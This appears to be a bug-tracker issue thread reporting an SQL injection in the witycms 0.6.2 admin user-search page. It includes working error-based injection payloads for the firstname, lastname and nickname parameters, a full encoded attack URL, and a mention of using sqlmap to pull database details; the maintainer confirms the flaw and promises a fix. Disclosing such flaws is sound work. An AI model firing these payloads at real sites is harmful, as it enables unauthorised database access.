Find a SQL injection

[twoHub]

Search for user discovery injection under the witycms 0.6.2 "Utilisateur" menu. No input parameters were filtered. /admin/user/users? Nickname=1&email=&firstname=&lastname=&groupe=
payload:
firstname=' AND (SELECT 6463 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(6463=6463,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zcMP&lastname=&nickname=root&email=&groupe=

lastname=' AND (SELECT 2839 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2839=2839,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oNFP&nickname=root&email=&groupe=

Defective pages and addresses

http://127.0.0.1/witycms/admin/user/users?nickname=roott%27+AND+%28SELECT+9674+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x71717a6271%2C%28SELECT+%28ELT%289674%3D9674%2C1%29%29%29%2C0x7178627871%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+YoTG&email=&firstname=&lastname=&groupe=

Attack through sqlmap, find database name and database type.

A page executed by background code.

\apps\user\front\model.php

——中科卓信软件测评技术中心

[hackd0g]

老哥 你这疯狂刷cve啊

[JohanDufau]

Hello,
PDO's quote function is designed to protect from SQL Injection.
I just tried on my local instance of this CMS and the attack seems not working. I just get an empty result on the users list. Can you be more specific on the issue you are reporting here?

Thx!

[JohanDufau]

Ok, I see the issue. A fix is coming. Thx!